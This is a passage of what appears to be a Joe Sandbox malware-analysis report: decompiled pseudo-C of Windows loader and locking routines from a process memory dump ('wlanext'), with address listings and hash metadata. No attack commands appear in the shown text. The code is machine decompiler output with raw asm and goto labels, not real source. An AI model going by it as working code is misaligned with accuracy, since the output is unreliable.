											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0352006A(0x35d8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x35d8608);
												E0352B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x35d6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x35d6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E034FFFB0(_t198, _t240, 0x35d8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E035200C2(0x35d8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                  0x035120a0
                                  0x035120a8
                                  0x035120ad
                                  0x035120b3
                                  0x035120b8
                                  0x035120c2
                                  0x035120c7
                                  0x035120cb
                                  0x035120d2
                                  0x03512263
                                  0x03512266
                                  0x03555836
                                  0x03555836
                                  0x00000000
                                  0x0351226c
                                  0x0351226c
                                  0x03512270
                                  0x03512274
                                  0x035120e2
                                  0x035120e2
                                  0x035120e6
                                  0x035120ee
                                  0x035557dc
                                  0x035557de
                                  0x035557ec
                                  0x035557ec
                                  0x035557f1
                                  0x035557f3
                                  0x035557f8
                                  0x00000000
                                  0x035557f8
                                  0x035557e0
                                  0x035557e4
                                  0x035557ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035557ea
                                  0x035120f4
                                  0x035120f4
                                  0x035120f8
                                  0x035120f8
                                  0x035120fc
                                  0x03512100
                                  0x03512106
                                  0x03512201
                                  0x03512206
                                  0x0351220b
                                  0x0351220e
                                  0x035122a9
                                  0x035122ac
                                  0x00000000
                                  0x00000000
                                  0x035122b2
                                  0x035122b5
                                  0x03555801
                                  0x03555806
                                  0x00000000
                                  0x00000000
                                  0x03555810
                                  0x03555815
                                  0x03555818
                                  0x00000000
                                  0x00000000
                                  0x0355581e
                                  0x035122bb
                                  0x035122bb
                                  0x03512218
                                  0x03512218
                                  0x0351221c
                                  0x03512220
                                  0x03512222
                                  0x035122c2
                                  0x035122c4
                                  0x035122dc
                                  0x035122dc
                                  0x035122e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035122e7
                                  0x035122c8
                                  0x035122cd
                                  0x035122d3
                                  0x035122d6
                                  0x03555823
                                  0x03555825
                                  0x03555827
                                  0x00000000
                                  0x00000000
                                  0x0355582d
                                  0x00000000
                                  0x0355582d
                                  0x00000000
                                  0x03512228
                                  0x03512228
                                  0x00000000
                                  0x03512228
                                  0x03512222
                                  0x03512214
                                  0x03512214
                                  0x00000000
                                  0x03512114
                                  0x03512114
                                  0x03512114
                                  0x0351211a
                                  0x0351211c
                                  0x03512348
                                  0x0351234d
                                  0x03555840
                                  0x03555845
                                  0x03555848
                                  0x0355584e
                                  0x0355584e
                                  0x03555848
                                  0x03512353
                                  0x03512355
                                  0x03512388
                                  0x03512388
                                  0x03512368
                                  0x0351236a
                                  0x0351236c
                                  0x0351238f
                                  0x00000000
                                  0x0351236e
                                  0x0351236e
                                  0x0351218e
                                  0x0351218e
                                  0x03512191
                                  0x03512195
                                  0x03555a03
                                  0x03555a06
                                  0x03555a0c
                                  0x03555a0f
                                  0x03555a11
                                  0x03555a13
                                  0x03555a13
                                  0x03555a19
                                  0x03555a1f
                                  0x00000000
                                  0x0351219b
                                  0x0351219b
                                  0x035121a0
                                  0x03512282
                                  0x03512284
                                  0x03512284
                                  0x03512284
                                  0x03512284
                                  0x035121a6
                                  0x035121a9
                                  0x035121ac
                                  0x035121ae
                                  0x035121b3
                                  0x0351228b
                                  0x03512290
                                  0x03512379
                                  0x03512296
                                  0x03512298
                                  0x03512298
                                  0x03512290
                                  0x035121b9
                                  0x035121be
                                  0x035122a2
                                  0x035122a2
                                  0x035121c4
                                  0x035121c8
                                  0x035121cc
                                  0x035121d0
                                  0x035121d4
                                  0x035121de
                                  0x035121e3
                                  0x03555a29
                                  0x03555a2c
                                  0x00000000
                                  0x00000000
                                  0x03555a3b
                                  0x00000000
                                  0x035121e9
                                  0x035121e9
                                  0x035121e9
                                  0x035121ee
                                  0x035121f1
                                  0x03555a45
                                  0x03555a4b
                                  0x03555a52
                                  0x03555a58
                                  0x03555a5d
                                  0x03555a5f
                                  0x03555a71
                                  0x03555a61
                                  0x03555a6a
                                  0x03555a6a
                                  0x03555a76
                                  0x03555a79
                                  0x03555a7f
                                  0x03555a83
                                  0x03555a85
                                  0x03555a87
                                  0x03555a87
                                  0x03555a8c
                                  0x03555a91
                                  0x03555a97
                                  0x03555a9f
                                  0x03555aa0
                                  0x03555aa1
                                  0x03555aa6
                                  0x03555aab
                                  0x03555ab1
                                  0x03555ab3
                                  0x03555ab9
                                  0x03555aca
                                  0x03555ad4
                                  0x03555ad4
                                  0x03555ade
                                  0x03555ade
                                  0x03555aab
                                  0x03555a79
                                  0x03555a52
                                  0x035121f7
                                  0x035121f9
                                  0x035121fe
                                  0x035121fe
                                  0x035121e3
                                  0x03512195
                                  0x0351236c
                                  0x03512122
                                  0x03512122
                                  0x03512124
                                  0x03512231
                                  0x03512236
                                  0x03512236
                                  0x03512238
                                  0x03512238
                                  0x03512240
                                  0x03512242
                                  0x03512244
                                  0x035559fc
                                  0x0351218c
                                  0x0351218c
                                  0x00000000
                                  0x0351218c
                                  0x0351224a
                                  0x0351224f
                                  0x03512256
                                  0x03512304
                                  0x03512309
                                  0x0351230f
                                  0x0351231e
                                  0x0351231e
                                  0x0351231e
                                  0x03512320
                                  0x03512325
                                  0x0351232a
                                  0x0351232c
                                  0x0351233e
                                  0x0351233e
                                  0x00000000
                                  0x0351232c
                                  0x03512311
                                  0x03512317
                                  0x0351231a
                                  0x0351231c
                                  0x03512380
                                  0x03512380
                                  0x03512380
                                  0x03512384
                                  0x00000000
                                  0x00000000
                                  0x03512386
                                  0x00000000
                                  0x0351231c
                                  0x0351225c
                                  0x0351225c
                                  0x00000000
                                  0x0351225c
                                  0x0351212a
                                  0x03512134
                                  0x03512138
                                  0x0351213d
                                  0x03555858
                                  0x03555863
                                  0x03555863
                                  0x03555867
                                  0x0355586a
                                  0x00000000
                                  0x00000000
                                  0x0355586c
                                  0x0355586c
                                  0x03555871
                                  0x03555875
                                  0x03555877
                                  0x03555997
                                  0x0355599c
                                  0x035559a1
                                  0x035559a7
                                  0x035559a7
                                  0x00000000
                                  0x035559a7
                                  0x0355587d
                                  0x00000000
                                  0x0355588b
                                  0x0355588b
                                  0x03555890
                                  0x03555892
                                  0x03555894
                                  0x03555899
                                  0x0355589b
                                  0x035558a0
                                  0x035558a0
                                  0x035558aa
                                  0x035558b2
                                  0x035558b6
                                  0x035558be
                                  0x035558c6
                                  0x035558c9
                                  0x0355590d
                                  0x03555917
                                  0x0355591a
                                  0x0355591c
                                  0x03555920
                                  0x03555928
                                  0x0355592a
                                  0x0355592c
                                  0x0355592e
                                  0x0355592e
                                  0x035558cb
                                  0x035558cd
                                  0x035558d8
                                  0x035558e0
                                  0x035558f4
                                  0x035558fe
                                  0x035558fe
                                  0x0355593a
                                  0x0355593e
                                  0x03555940
                                  0x03555942
                                  0x00000000
                                  0x03555944
                                  0x03555944
                                  0x03555949
                                  0x0355594e
                                  0x0355594e
                                  0x03555953
                                  0x0355595b
                                  0x03555976
                                  0x03555976
                                  0x0355597a
                                  0x0355597f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03555981
                                  0x03555981
                                  0x03555981
                                  0x03555983
                                  0x03555988
                                  0x0355598d
                                  0x03555991
                                  0x03555991
                                  0x00000000
                                  0x0355595d
                                  0x0355595d
                                  0x03555963
                                  0x03555965
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03555967
                                  0x03555967
                                  0x0355596b
                                  0x0355596d
                                  0x00000000
                                  0x00000000
                                  0x0355596f
                                  0x03555971
                                  0x03555971
                                  0x03555974
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03555974
                                  0x00000000
                                  0x03555967
                                  0x0355595b
                                  0x03555942
                                  0x03555863
                                  0x03512143
                                  0x03512143
                                  0x03512149
                                  0x0351214f
                                  0x035122f1
                                  0x035122f6
                                  0x00000000
                                  0x03512173
                                  0x03512173
                                  0x0351217d
                                  0x03512181
                                  0x03512186
                                  0x035559ae
                                  0x035559b2
                                  0x035559b5
                                  0x035559b7
                                  0x035559ba
                                  0x035559cd
                                  0x035559d1
                                  0x035559d5
                                  0x035559d9
                                  0x035559db
                                  0x00000000
                                  0x00000000
                                  0x035559dd
                                  0x035559dd
                                  0x035559e1
                                  0x035559e4
                                  0x035559e7
                                  0x035559ee
                                  0x035559ee
                                  0x035559f3
                                  0x035559f3
                                  0x00000000
                                  0x03512186
                                  0x0351214f
                                  0x03512106
                                  0x03512266
                                  0x035120d8
                                  0x035120da
                                  0x035120e0
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd6aa5ffc45ec8f3ffb1cb254507a9a6defd3a3366142ce5f2c37640ef1221d1
                                  • Instruction ID: 202584b056e3ab68f6a8584bf2cced301d72c9bce19acc2fd4ecdf504daf34a8
                                  • Opcode Fuzzy Hash: bd6aa5ffc45ec8f3ffb1cb254507a9a6defd3a3366142ce5f2c37640ef1221d1
                                  • Instruction Fuzzy Hash: 37F1F9316083459FE725CB28E45076AB7F5BF86324F088D5EF8568B2B0E734E855CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034FD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E034FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x35dd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E034F6600(0x35d52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x35d7b9c; // 0x0
							_t281 = L03504620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0352F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x35d7b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x35d7b8c; // 0xb429e0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xb42a90
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E03502280(_t200, 0x35d84d8);
									_t277 =  *0x35d85f4; // 0xb42ed0
									_t351 =  *0x35d85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x73b60000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xb42f18
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xb42e68
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xb42f18
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xb447c8
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E034FFFB0(_t287, _t353, 0x35d84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0353CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E034F6600(0x35d52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E034F7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x35db239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0356E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x35d8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x35db218; // 0x0
														asm("ror edi, cl");
														 *0x35db1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03502280(_t250, 0x35d84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03523898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E034FFFB0(_t293, _t353, 0x35d84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E035237F5(_t353, 0);
																}
																E03520413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03519B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E035102D6(_t174);
																}
																L035077F0( *0x35d7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0351C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L034FEC7F(_t353);
										L035119B8(_t287, 0, _t353, 0);
										_t200 = E034EF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0352B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x35db2f8; // 0xf70000
									if((_t206 |  *0x35db2fc) == 0 || ( *0x35db2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x35db2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E03596B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E03596AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E034FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L034FEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03529730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E034FE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L034F8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03523C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                  0x034fd5f2
                                  0x034fd5f5
                                  0x034fd5f5
                                  0x034fd5fd
                                  0x034fd600
                                  0x034fd60a
                                  0x034fd60d
                                  0x034fd617
                                  0x034fd61d
                                  0x034fd627
                                  0x034fd62e
                                  0x034fd911
                                  0x034fd913
                                  0x00000000
                                  0x034fd919
                                  0x034fd919
                                  0x034fd919
                                  0x034fd634
                                  0x034fd634
                                  0x034fd634
                                  0x034fd634
                                  0x034fd640
                                  0x034fd8bf
                                  0x00000000
                                  0x034fd646
                                  0x034fd646
                                  0x034fd64d
                                  0x034fd652
                                  0x0354b2fc
                                  0x0354b2fc
                                  0x0354b302
                                  0x0354b33b
                                  0x0354b341
                                  0x00000000
                                  0x0354b304
                                  0x0354b304
                                  0x0354b319
                                  0x0354b31e
                                  0x0354b324
                                  0x0354b326
                                  0x0354b332
                                  0x0354b347
                                  0x0354b34c
                                  0x0354b351
